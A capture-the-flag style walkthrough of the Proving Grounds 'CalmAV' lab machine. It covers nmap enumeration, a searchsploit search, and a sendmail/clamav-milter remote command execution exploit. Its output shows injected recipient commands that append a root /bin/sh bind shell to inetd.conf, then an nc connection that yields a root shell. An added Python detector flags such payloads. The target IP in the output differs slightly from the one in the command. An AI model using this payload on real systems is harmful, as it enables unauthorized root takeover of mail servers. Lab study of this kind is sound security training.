Hi everyone! Today's writeup is on CalmAV from Proving Grounds. It is said to be a retired OSCP machine and it is part of TJNull's OSCP prep list. Let's get started!

Nmap enumeration

kali@kali:~$ sudo nmap -sC -sV -p- 192.168.70.42
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 22:35 EDT
Nmap scan report for 192.168.70.42
Host is up (0.00024s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.70.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
MAC Address: 00:50:56:BF:F1:17 (VMware)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h59m58s, deviation: 2h49m42s, median: 3h59m58s
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-10-17T02:35:55-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Vulnerability found

Searchsploit

kali@kali:~$ searchsploit sendmail
-------------------------------------------------- ---------------------------------
 Exploit Title                                    |  Path
-------------------------------------------------- ---------------------------------
Berkeley Sendmail 5.58 - Debug                    | linux/remote/19028.txt
BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP | multiple/local/19556.sh
Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6 | linux/local/19474.txt
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail)  | multiple/remote/9913.rb
Eric Allman Sendmail 8.8.x - Socket Hijack        | linux/local/19602.c
Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of | linux/dos/19701.sh
Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Si | php/webapps/29481.txt
Linux Kernel 2.0 Sendmail - Denial of Service     | linux/dos/19282.c
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1 | linux/local/20000.c
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1 | linux/local/20001.sh
Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / | multiple/remote/19084.txt
Morris Worm - sendmail Debug Mode Shell Escape (M | unix/remote/45789.rb
ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_ | php/webapps/29957.txt
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'ad | php/local/27334.txt
PHPMailer < 5.2.19 - Sendmail Argument Injection  | multiple/webapps/41688.rb
Sendmail 8.11.6 - Address Prescan Memory Corrupti | unix/local/22442.c
Sendmail 8.11.x (Linux/i386) - Local Privilege Es | linux/local/411.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21060.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21061.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21062.txt
Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21063.txt
Sendmail 8.12.6 - Compromised Source Backdoor     | unix/remote/21919.sh
Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Comman | linux/remote/24.c
Sendmail 8.12.9 - 'Prescan()' Variant Remote Buff | linux/remote/23154.c
Sendmail 8.12.x - 'X-header' Remote Heap Buffer O | linux/dos/32995.txt
Sendmail 8.12.x - Header Processing Buffer Overfl | unix/remote/22313.c
Sendmail 8.12.x - Header Processing Buffer Overfl | unix/remote/22314.c
Sendmail 8.12.x - SMRSH Double Pipe Access Valida | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC)    | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution   | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Servic | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Lockin | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Lockin | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Com | multiple/remote/4761.pl
WEBgais 1.0 - websendmail Remote Command Executio | cgi/remote/20483.txt
-------------------------------------------------- ---------------------------------

Given the machine name, CalmAV, the "Sendmail with clamav-milter < 0.91.2 - Remote Command Execution" entry (multiple/remote/4761.pl) is the one that stands out.

Download and run exploit

kali@kali:~$ searchsploit -m multiple/remote/4761.pl
...
kali@kali:~$ perl 4761.pl 192.168.70.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.77.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 17 Oct 2021 08:07:59 -0400; (No UCE/UBE) logging access from: [192.168.77.200](FAIL)-[192.168.77.200]
250-localhost.localdomain Hello [192.168.77.200], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 19HC7xE7004017 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

kali@kali:~$ nc 192.168.70.42 31337
whoami
root
pwd
/
cd /root
ls
dbootstrap_settings
install-report.template
proof.txt
cat proof.txt
a1d*****************************
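From the defender's side, the transcript above leaves two clear artefacts: recipient addresses whose local part is a shell pipeline, and a new inetd.conf entry serving /bin/sh as root. The following Python is an added example (not part of the original writeup or the exploit) that flags both; the sample transcript and inetd.conf are constructed from the output shown above, with one ordinary recipient added for contrast.

```python
import os
import re

# Constructed sample: SMTP server responses of the shape shown in the
# exploit transcript above, plus one ordinary recipient for contrast.
SAMPLE_TRANSCRIPT = """\
250 2.1.0 <>... Sender ok
250 2.1.5 <alice@localhost.localdomain>... Recipient ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
"""
# Constructed sample inetd.conf after the injected line has been appended.
SAMPLE_INETD_CONF = """\
#:STANDARD: These are standard services.
daytime stream tcp nowait root internal
31337 stream tcp nowait root /bin/sh -i
"""
# Sendmail acknowledges each accepted recipient as "250 2.1.5 <addr>... Recipient ok".
RCPT_OK = re.compile(r'^250 2\.1\.5 <(?P<addr>.*)>\.\.\. Recipient ok$')
SHELL_META = re.compile(r'[|;`$&]')

def extract_recipients(transcript):
    """Return every address the server accepted as a recipient."""
    matches = (RCPT_OK.match(line) for line in transcript.splitlines())
    return [m.group('addr') for m in matches if m]

def is_suspicious(addr):
    """True if the local part carries shell syntax instead of a mailbox name."""
    local = addr.split('@', 1)[0]
    # user+detail with a detail opening on a pipe is exactly the shape the
    # vulnerable clamav-milter handed to a shell; other metacharacters are flagged too.
    if '+' in local and local.split('+', 1)[1].lstrip('"').startswith('|'):
        return True
    return bool(SHELL_META.search(local))

def flag_recipients(transcript):
    """Recipient addresses that look like command injection attempts."""
    return [a for a in extract_recipients(transcript) if is_suspicious(a)]

def root_shell_services(inetd_conf):
    """inetd.conf lines that hand an interactive shell, as root, to whoever connects."""
    hits = []
    for line in inetd_conf.splitlines():
        fields = line.split()
        if line.startswith('#') or len(fields) < 6:
            continue
        if fields[4] == 'root' and os.path.basename(fields[5]) in ('sh', 'bash', 'dash'):
            hits.append(line)
    return hits
```

The same two checks apply to sendmail's maillog (the to=<...> field) and to a file-integrity baseline of /etc/inetd.conf, which is where they would run in practice.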

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
